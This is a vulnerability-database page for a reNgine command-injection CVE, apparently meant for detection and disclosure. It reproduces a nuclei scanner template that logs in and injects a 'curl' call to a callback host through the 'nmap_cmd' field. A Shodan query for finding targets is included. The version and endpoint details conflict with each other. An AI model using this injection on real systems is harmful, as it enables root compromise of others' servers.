Lucene search
K

reNgine 2.2.0 - Command Injection

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 115 Views

reNgine 2.2.0 has a high severity command injection vulnerability allowing OS command execution.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for OS Command Injection in Yogeshojha Rengine
23 Nov 202420:00
githubexploit
Circl
CVE-2023-50094
1 Jan 202419:26
circl
CNNVD
reNgine Operating System Command Injection Vulnerability
1 Jan 202400:00
cnnvd
CVE
CVE-2023-50094
1 Jan 202400:00
cve
Cvelist
CVE-2023-50094
1 Jan 202400:00
cvelist
NVD
CVE-2023-50094
1 Jan 202418:15
nvd
OSV
CVE-2023-50094
1 Jan 202400:00
osv
Prion
Command injection
1 Jan 202418:15
prion
Positive Technologies
PT-2024-13859 · Rengine · Rengine
1 Jan 202400:00
ptsecurity
RedhatCVE
CVE-2023-50094
9 Jan 202612:37
redhatcve
Rows per page
id: CVE-2023-50094

info:
  name: reNgine 2.2.0 - Command Injection
  author: Zierax
  severity: high
  description: |
    reNgine before 2.1.2 allows OS Command Injection if an adversary has a valid session ID. The attack places shell metacharacters in an api/tools/waf_detector/?url= string. The commands are executed as root via subprocess.check_output.
  impact: |
    Authenticated attackers can inject arbitrary OS commands that execute as root, leading to complete system compromise and data exfiltration.
  remediation: |
    Upgrade reNgine to version 2.1.2 or later which includes proper input validation.
  reference:
    - https://github.com/yogeshojha/rengine
    - https://github.com/Zierax/CVE-2023-50094_POC
    - https://nvd.nist.gov/vuln/detail/CVE-2023-50094
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-50094
    cwe-id: CWE-78
    epss-score: 0.1354
    epss-percentile: 0.95998
    cpe: cpe:2.3:a:yogeshojha:rengine:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: yogeshojha
    product: rengine
    shodan-query: title:"reNgine"
  tags: cve,cve2023,rengine,rce,injection,authenticated,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(body), "rengine")'
        internal: true

  - raw:
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}

      - |
        POST /scan-engine/update HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"nmap_cmd": 'curl {{interactsh-url}}'}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol_2, "dns")'
          - 'status_code_2 == 200'
        condition: and
# digest: 4a0a004730450220456d6965d77718f38dd6e9a4b2a0d6617513a25b8669376b59e8d94df2330340022100f2c013e355fbf47d7c8b953df890224e8bb4dc803552b87aa718843dd9b408cf:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.18.8
EPSS0.1354
SSVC
115